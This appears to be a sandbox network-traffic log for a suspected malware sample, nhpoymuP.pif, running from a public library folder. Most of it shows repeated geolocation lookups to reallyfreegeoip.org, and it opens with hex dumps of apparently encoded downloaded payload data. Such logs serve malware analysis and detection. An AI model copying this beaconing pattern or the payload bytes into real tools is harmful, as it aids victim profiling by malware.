2025-01-02 15:04:59 UTC	8000	IN	Data Raw: 48 75 51 63 32 6d 71 72 44 4d 30 45 57 63 66 35 33 78 4c 51 6f 70 4e 6c 55 41 4b 77 33 45 31 56 6f 44 4b 51 58 4e 34 4e 4a 4c 67 46 58 4b 64 36 6c 39 6b 69 42 51 37 37 69 4a 52 66 35 47 45 62 37 55 59 75 74 78 33 67 4f 6c 38 5a 43 65 67 42 66 35 64 42 48 65 58 37 30 73 37 37 76 48 74 79 33 64 41 34 67 32 59 4f 79 54 75 44 74 45 33 76 48 46 31 67 79 58 58 74 78 53 44 55 63 42 6e 33 79 41 38 74 62 69 41 4a 32 6c 45 75 47 30 42 38 72 69 31 2f 4f 63 32 61 2f 6b 57 6b 76 71 70 2b 2f 31 54 43 53 30 79 36 38 4b 69 4a 42 74 41 79 78 4f 44 4a 7a 42 52 42 55 4c 77 4b 33 6b 70 4d 6a 2f 31 61 2f 4b 52 32 58 5a 45 65 79 68 6e 79 34 32 4a 32 43 72 43 78 66 6a 57 51 30 78 31 56 4b 57 58 53 53 6a 41 4f 54 79 58 57 44 63 46 47 64 47 4f 31 37 54 79 7a 75 49 69 52 79 56 50 Data Ascii: HuQc2mqrDM0EWcf53xLQopNlUAKw3E1VoDKQXN4NJLgFXKd6l9kiBQ77iJRf5GEb7UYutx3gOl8ZCegBf5dBHeX70s77vHty3dA4g2YOyTuDtE3vHF1gyXXtxSDUcBn3yA8tbiAJ2lEuG0B8ri1/Oc2a/kWkvqp+/1TCS0y68KiJBtAyxODJzBRBULwK3kpMj/1a/KR2XZEeyhny42J2CrCxfjWQ0x1VKWXSSjAOTyXWDcFGdGO17TyzuIiRyVP
2025-01-02 15:04:59 UTC	8000	IN	Data Raw: 61 41 32 6c 5a 41 4b 2b 71 45 56 32 53 36 6b 61 49 49 6f 7a 4b 6b 6f 44 65 31 4b 65 43 4c 43 77 50 36 6f 63 2b 58 75 4b 4d 69 48 4c 4b 2f 39 5a 34 58 72 53 68 49 62 4e 57 78 66 33 2b 58 6f 71 36 7a 36 37 66 66 4e 6e 35 37 30 55 45 64 38 79 61 61 4c 58 79 52 55 6e 50 55 58 6f 41 55 71 41 48 39 33 74 37 4d 72 50 68 4c 6c 61 44 64 48 38 4f 6e 72 7a 73 46 47 43 43 34 7a 6d 6f 34 70 62 35 4c 56 4b 44 33 2f 51 46 2b 35 78 77 51 77 66 52 4a 6a 76 52 48 34 56 58 4e 50 67 67 4c 6a 38 35 51 37 6a 4e 53 64 78 4b 30 49 43 41 51 6e 69 4b 4b 75 6b 39 59 4c 48 5a 57 2b 6a 76 43 39 69 34 6d 45 30 72 77 30 69 56 61 4d 49 77 76 56 6c 38 34 68 56 66 38 46 4f 79 52 4c 76 50 7a 6b 6f 73 6d 53 43 6a 31 6b 5a 32 72 53 4e 2f 71 63 37 47 65 56 49 7a 56 70 76 70 6e 69 31 4f 64 42 Data Ascii: aA2lZAK+qEV2S6kaIIozKkoDe1KeCLCwP6oc+XuKMiHLK/9Z4XrShIbNWxf3+Xoq6z67ffNn570UEd8yaaLXyRUnPUXoAUqAH93t7MrPhLlaDdH8OnrzsFGCC4zmo4pb5LVKD3/QF+5xwQwfRJjvRH4VXNPggLj85Q7jNSdxK0ICAQniKKuk9YLHZW+jvC9i4mE0rw0iVaMIwvVl84hVf8FOyRLvPzkosmSCj1kZ2rSN/qc7GeVIzVpvpni1OdB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	188.114.97.3	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:29 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:29 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145118 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Fs1W0ndu138tOU0%2BlBU8cWYTHt7GLT%2Fk2kvY8dpBKKclbUfxWateyRKnuI8fTovntTDUUDyOeBFa%2Bgwb5oTcPbvNKwOrSi9Ubc96e4A7lOSgF%2FHdSUzNrqtLfkeBCgTyzwPIIjZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba5c72d84439f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1708&rtt_var=663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1622222&cwnd=241&unsent_bytes=0&cid=651b6c03702810ec&ts=192&x=0"
2025-01-02 15:05:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	188.114.97.3	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:31 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 15:05:31 UTC	855	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145120 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CkzBfNQ7ICkyfHWaZhwWJzXAL1rtNkzaJ3jsE1U4GIhC%2FA3iuOr7wKUTFYxYAg78Y0d1GCqh9dFi%2FgWuv0hG%2FAVyU7WuQdQyll9JGSwezxYziRnuSgXDTHRIxlb4W2ZBbjWvytOD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba5d45a65c351-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1688&rtt_var=638&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1707602&cwnd=184&unsent_bytes=0&cid=8c9b9aa428f68c53&ts=154&x=0"
2025-01-02 15:05:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	188.114.97.3	443	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:32 UTC	861	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145121 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qhMHK9ZYchrQH2%2BBPQ1Ed0UhGe8tCXMitA5S%2B5oZA7bVKsINu%2Frh1c%2BnNHNB4nIeNmBcYDHBdxo%2FylAy%2FegMcXu1OeAqM5sAgfqlqtkyeNEC1ZkdFMe5LQzGva3Kg5RSGuZ0fQX3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba5db7f85c3eb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1571&rtt_var=594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1858688&cwnd=240&unsent_bytes=0&cid=86dfa8f492ca58d1&ts=173&x=0"
2025-01-02 15:05:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	188.114.97.3	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:33 UTC	849	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145123 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X6mT23UK1Tpfmky0BnGE5tb17Gsno0jPLZcwHDiI6EeeJ7gKZvSG9EQLPsf3KObpzdUSThGYIGlSTMvOgjQixribXMPv60qA4z5odTezQ3UMlVhNMXlGRKZyLKrPfqSAayGSJyVO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba5e2be6b440e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1617&rtt_var=643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1655328&cwnd=236&unsent_bytes=0&cid=a2558694827c7deb&ts=174&x=0"
2025-01-02 15:05:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	188.114.97.3	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:36 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 15:05:37 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145126 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x5SL4ru1Ll6%2BGmeZ3J9D1oyx62MUR06YMKXTEccNxWk%2FWvjQ%2BL1pUzeXKDNQf4OrjqwbLggwFjqPv5qBD91Qh33v0v19LOozBRdKVb9i%2FSePYUU0s2jmmbEfGGaAXfYAY%2FdRItNb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba5f6ce688ce6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6323&min_rtt=6323&rtt_var=3161&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=128810&cwnd=162&unsent_bytes=0&cid=2f31754a8cf66de1&ts=184&x=0"
2025-01-02 15:05:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	188.114.97.3	443	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:37 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 15:05:37 UTC	860	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145126 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zz4P3ej6hUsDl%2FCmxLeardxq5P4pYh1sVd9U956wuYk0lWVuRYs1GJETtzJ%2Bjmu3L%2F9cY65qAKkQOiSLfIbOBDW4trDuKknwzSdRN9P9jMWotNvlSMl6NjkXooi7Ci%2BF3H8%2BEUCX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba5f988db3354-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6404&min_rtt=2010&rtt_var=3563&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1452736&cwnd=114&unsent_bytes=0&cid=133888e3f076284f&ts=166&x=0"
2025-01-02 15:05:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	188.114.97.3	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:38 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 15:05:39 UTC	854	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145128 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RG5V8nmPEzKtbFpRKBSwvK8Ws8PbngkGYdkdfrN9NBgLVnj4Ztw4Yzd%2BwvmP5ir9HF9ZEjCUJ5hmE6JgaIgf78QQKwd3nm6BTjOWH8oplFdednhMoKryLMSIgVPxQjS04hxt6bHF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba602cdbe0f8c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=22000&min_rtt=1738&rtt_var=12782&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1680092&cwnd=212&unsent_bytes=0&cid=c4f777e4463ce14b&ts=158&x=0"
2025-01-02 15:05:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49752	188.114.97.3	443	8008	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:39 UTC	863	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145128 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0exIDplgBj8Ek%2BzNuNb7%2FzfI5NOMvQmMIJunlT9z4PWM2cxuLFUsbtfVIy%2BYp%2BzppHzQjFbXWRslPW6mKaE%2FxF2EhgzLOD%2FjQaWd58MgoF8%2BsFJG78gwjdVXd7aKU6HZptKXYJ7n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba6073cdeefa3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2453&min_rtt=2381&rtt_var=944&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1226375&cwnd=114&unsent_bytes=0&cid=3f13abd7db8b10f6&ts=160&x=0"
2025-01-02 15:05:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	188.114.97.3	443	7688	C:\Users\Public\Libraries\nhpoymuP.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-02 15:05:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 15:05:40 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 15:05:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1145129 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lAQg6DVRJgtujiFj16Sh%2F2lr4va97cjEEHVhxGKTtUmnDMZ46fN8XmnpjwOiK%2Fut01bf7eKkZecGhdtp2MIEaE3CbajacqdqG9pk0jT4Jx082ke7ZUZTWHTLCBtQBUrOTHbXuL4E"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbba60a2a22ef9f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2019&rtt_var=768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1446260&cwnd=219&unsent_bytes=0&cid=0f7eb607ae18beef&ts=160&x=0"
